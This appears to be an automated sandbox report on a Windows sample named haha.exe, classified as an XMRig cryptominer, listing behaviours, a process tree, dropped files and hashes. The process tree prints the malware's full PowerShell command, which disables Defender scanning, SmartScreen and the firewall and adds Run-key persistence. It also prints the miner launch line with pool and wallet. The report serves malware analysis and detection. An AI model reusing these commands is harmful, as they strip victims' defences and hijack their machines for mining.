Overview

overview

10

Static

static

haha.exe

windows7_x64

10

haha.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    608s
  • max time network
    603s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-07-2022 08:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    haha.exe

  • Size

    3.0MB

  • MD5

    9984a772edde2f48200fe346b4ef8547

  • SHA1

    c8760bb8c67926372461f2a43471ac1466c024ed

  • SHA256

    9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e

  • SHA512

    e144e0f43888e503a0c866bcc059e3152a5fa4464232d3e2df5bc559b55e9a8128070bbc353ec8ca427187abc58ddd37ff211a071bbbe2200395590ead1ba1da

Score
10/10
xmrigevasionminer

Malware Config

Signatures

  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 1 IoCs
    miner
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\haha.exe
    "C:\Users\Admin\AppData\Local\Temp\haha.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Users\Admin\AppData\Local\Temp\79571.exe
        "C:\Users\Admin\AppData\Local\Temp\79571.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
          "C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
          4⤵
          • Executes dropped EXE
          PID:2748
        • C:\Users\Admin\AppData\Local\Temp\DllHost.exe
          "C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
            5⤵
            • Modifies security service
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:33560
            • C:\ProgramData\UpSys.exe
              "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:67976
              • C:\ProgramData\UpSys.exe
                "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:94360
                • C:\ProgramData\UpSys.exe
                  "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
                  8⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:94992
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                    9⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:94460
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              PID:85036
          • C:\ProgramData\Systemd\procexp.exe
            --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:69608
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:92304

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\MicrosoftNetwork\System.exe
    Filesize

    440KB

    MD5

    6368031626da1f0d51bcac43104b123f

    SHA1

    5a340a1a3edc0bf03526e677a0415ffd156c139c

    SHA256

    11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

    SHA512

    442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

    Download Submit

  • C:\ProgramData\Systemd\procexp.exe
    Filesize

    7.9MB

    MD5

    2d9fb9ed8bebb55280b81a4652dcfa11

    SHA1

    76300e059e74d8cfc99a736917cd3a512dd32cab

    SHA256

    573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf

    SHA512

    ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

    Download Submit

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    Download Submit

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    Download Submit

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    Download Submit

  • C:\ProgramData\UpSys.exe
    Filesize

    923KB

    MD5

    efe5769e37ba37cf4607cb9918639932

    SHA1

    f24ca204af2237a714e8b41d54043da7bbe5393b

    SHA256

    5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

    SHA512

    33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    0c15ac263e9da0baa9287d105570e6f1

    SHA1

    99aa6487b21dc6e1cd5f4a097313508df50f0829

    SHA256

    40dc53e1f4d85e4c22d6e35799dc25639d1da6e27805c34f6af092b68a8735c3

    SHA512

    2aeef83af972de648d126b8fc347e5142113a842a2280f97435e85c8c0c5700dcf390b2c5afa3f5b868a0c404fc2c47ae73178b666677529ae7b3c63c7f67cac

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\79571.exe
    Filesize

    1.8MB

    MD5

    cb9659a181ad8cc58023c5d8566b2d5a

    SHA1

    7b6c751aefca16847c2b1e57712342a7dffe585f

    SHA256

    d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

    SHA512

    6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\79571.exe
    Filesize

    1.8MB

    MD5

    cb9659a181ad8cc58023c5d8566b2d5a

    SHA1

    7b6c751aefca16847c2b1e57712342a7dffe585f

    SHA256

    d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

    SHA512

    6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\79571.ps1
    Filesize

    128B

    MD5

    d831df909c8d68d7ac710f09ea9a7294

    SHA1

    4cf51399d9895c799c297e5e3078fa25cf4940b5

    SHA256

    9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c

    SHA512

    000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\DllHost.exe
    Filesize

    440KB

    MD5

    6368031626da1f0d51bcac43104b123f

    SHA1

    5a340a1a3edc0bf03526e677a0415ffd156c139c

    SHA256

    11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

    SHA512

    442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\DllHost.exe
    Filesize

    440KB

    MD5

    6368031626da1f0d51bcac43104b123f

    SHA1

    5a340a1a3edc0bf03526e677a0415ffd156c139c

    SHA256

    11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

    SHA512

    442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
    Filesize

    2.8MB

    MD5

    77636b47fc9e1bc61a4a019371e09390

    SHA1

    615275ae7a28ee86cd9f4f586a3c7c5366490444

    SHA256

    7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

    SHA512

    ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
    Filesize

    2.8MB

    MD5

    77636b47fc9e1bc61a4a019371e09390

    SHA1

    615275ae7a28ee86cd9f4f586a3c7c5366490444

    SHA256

    7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

    SHA512

    ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

    Download Submit

  • memory/1172-130-0x0000000000000000-mapping.dmp

    Download

  • memory/1172-139-0x0000000006C40000-0x0000000006C5A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1172-138-0x0000000007F00000-0x000000000857A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1172-136-0x00000000066F0000-0x000000000670E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1172-135-0x00000000061D0000-0x0000000006236000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1172-134-0x00000000060F0000-0x0000000006156000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1172-133-0x00000000057F0000-0x0000000005812000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1172-132-0x00000000059C0000-0x0000000005FE8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1172-131-0x0000000002EA0000-0x0000000002ED6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1444-146-0x0000000000000000-mapping.dmp

    Download

  • memory/2284-141-0x0000000000000000-mapping.dmp

    Download

  • memory/2748-143-0x0000000000000000-mapping.dmp

    Download

  • memory/33560-149-0x0000000000000000-mapping.dmp

    Download

  • memory/33560-173-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/33560-152-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/33560-168-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/33560-150-0x000002B547FB0000-0x000002B547FD2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/67976-154-0x0000000000000000-mapping.dmp

    Download

  • memory/69608-175-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

    Filesize

    128KB

    Download

  • memory/69608-176-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp

    Filesize

    128KB

    Download

  • memory/69608-164-0x000001BE3B230000-0x000001BE3B250000-memory.dmp

    Filesize

    128KB

    Download

  • memory/69608-172-0x000001BE3CB30000-0x000001BE3CB50000-memory.dmp

    Filesize

    128KB

    Download

  • memory/69608-158-0x000001BE3B1E0000-0x000001BE3B200000-memory.dmp

    Filesize

    128KB

    Download

  • memory/69608-156-0x0000000000000000-mapping.dmp

    Download

  • memory/69608-174-0x000001BE3CB10000-0x000001BE3CB30000-memory.dmp

    Filesize

    128KB

    Download

  • memory/85036-159-0x0000000000000000-mapping.dmp

    Download

  • memory/94360-160-0x0000000000000000-mapping.dmp

    Download

  • memory/94460-165-0x0000000000000000-mapping.dmp

    Download

  • memory/94460-171-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/94460-170-0x00000191FFED0000-0x00000191FFF46000-memory.dmp

    Filesize

    472KB

    Download

  • memory/94460-169-0x00000191E7A80000-0x00000191E7AC4000-memory.dmp

    Filesize

    272KB

    Download

  • memory/94460-167-0x00007FFE18AD0000-0x00007FFE19591000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/94992-162-0x0000000000000000-mapping.dmp

    Download